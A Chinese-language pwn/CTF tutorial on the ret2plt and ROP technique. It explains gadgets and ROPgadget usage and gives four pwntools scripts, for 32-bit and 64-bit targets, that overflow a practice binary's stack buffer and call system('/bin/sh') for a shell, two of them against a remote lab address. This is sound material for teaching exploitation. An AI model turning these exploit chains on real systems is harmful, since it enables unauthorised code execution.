pwn学习-ret2plt
在之前进行ret2shellcode的学习时,需要NX保护机制是关闭的,但是现在一般情况下,保护机制默认都是开启的,那么该怎么办呢?
下面我们将学习ret2plt技术,够着ROP Chain来执行我们想要的代码
ret2plt
这种技术的目的是从 PLT 中泄漏函数的地址,例如二进制程序中有一个system或其他危险函数的调用,使用危险函数作为返回地址,获得shell
ROP
现在大多数的栈溢出漏洞都是使用ROP(Return Oriented Programming),即返回导向编程。通过栈溢出覆盖返回地址,使其跳转到我们想要执行恶意代码的位置中。
跳转的位置可能是一段本就就已经写好可以执行恶意命令的函数(这些指令通常有我们自己构造),这些一段代码由一段一段的指令组成,我们可能从这里取一个地址,从哪里取一个地址,这些一段一段的指令被我们称为gadget。
一段getshell的RoP Chain,可能是构造好的系统调用指令,或者跳转到libc中的某个函数。
gadget
这个单词很形象gadget,小工具,这些小工具组成了我们的getshell指令,通常gadget的表现形式如下:
xxx;retjmp xxxcall xxx
通常我们使用ROPgadget命令获取gadget,常见的参数如下:
--binary: 指定二进制文件--string: 指定搜索的文本--depth num: rop chain 深度
下面我们会进行实操,二进制文件如下:
链接:https://pan.baidu.com/s/1TKg-hr8dbvp5Th0DH2mdfA
提取码:bwck
32位 - ret2plt
我们需要获取system函数的地址和/bin/sh的地址,获取方法如下
objdump -d ret2plt | grep -i "system" -A 3
获取地址为80483b0,使用gdb中的info function也可以获取
接着获取/bin/sh,使用pwndbg和ROPgadget获取方式如下
先使用b main断点,然后run运行,接着search /bin/sh
ROPgadget --binary ret2plt --string "/bin/sh"
上述中的数据有些也可以使用pwntools获取,后续我会给两个不同的脚本
from pwn import *
p = process("./ret2plt")
e = ELF("./ret2plt")
p.recvuntil("Leave a message!")
padding = 0x18 + 0x4
system_addr = e.plt['system']
print("system_addr: ",system_addr)
sh_addr = next(e.search(b"/bin/sh"))
print("sh_addr: ",sh_addr)
payload = b"A" * padding + p32(system_addr) + p32(0) + p32(sh_addr)
p.send(payload)
p.interactive()
from pwn import *
p = process("./ret2plt")
# p = remote("192.168.154.176",8888)
p.recvuntil("Leave a message!")
padding = 0x18 + 0x4
system_addr = 0x080483b0
ret = 0
sh_addr = 0x08049614
payload = b"A" * padding + p32(system_addr) + p32(ret) + p32(sh_addr)
p.send(payload)
p.interactive()
上述中先传入system_addr执行system函数,然后传入ret值为0,因为在system_addr运行后需要一个返回地址,然后接着从栈取sh_addr作为参数,从而我们获取一个shell
64位 - ret2plt
脚本如下:
from pwn import *
p = process("./x64_ret2plt")
e = ELF("./x64_ret2plt")
p.recvuntil("Leave a message!")
padding = 0x10 + 0x8
ret = 0x0000000000400501
pop_rdi_ret = 0x0000000000400773
sh_addr = 0x00000000004007a3
system_addr = e.plt['system']
print(system_addr)
payload = b"A" * padding + p64(ret) + p64(pop_rdi_ret) + p64(sh_addr) + p64(system_addr)
# input("attack")
p.send(payload)
p.interactive()
from pwn import *
# context(log_level="debug")
# p = process("./x64_ret2plt")
p = remote("192.168.154.176",8888)
e = ELF("./x64_ret2plt")
p.recvuntil("Leave a message!")
padding = 0x10 + 0x8
ret = 0x0000000000400501
pop_rdi_ret = 0x0000000000400773
# sh_addr = 0x00000000004007a3
sh_addr = next(e.search('/bin/sh'))
system_addr = e.plt['system']
print(system_addr)
payload = b"A" * padding + p64(ret) + p64(pop_rdi_ret) + p64(sh_addr) + p64(system_addr)
# input("attack")
p.send(payload)
p.interactive()
x64的脚本有些不一样,需要在return system_addr前调用ret一次,保证栈平衡补充16个字节,ret和前面一样,使用ROPgadget获取即可
$ ROPgadget --binary ret2plt | grep ret
0x08048749 : adc al, 0x41 ; ret
0x08048457 : adc cl, cl ; repz ret
0x080485ef : adc ebx, dword ptr [edx] ; add byte ptr [eax], al ; add esp, 8 ; pop ebx ; ret
.... .... ... ... ... ... ...
0x08048459 : repz ret
0x08048362 : ret
0x0804846e : ret 0xeac1
0x08048454 : rol byte ptr [ebx - 0xc36ef3c], 1 ; ret
0x0804848e : rol byte ptr [ebx - 0xc36ef3c], cl ; ret
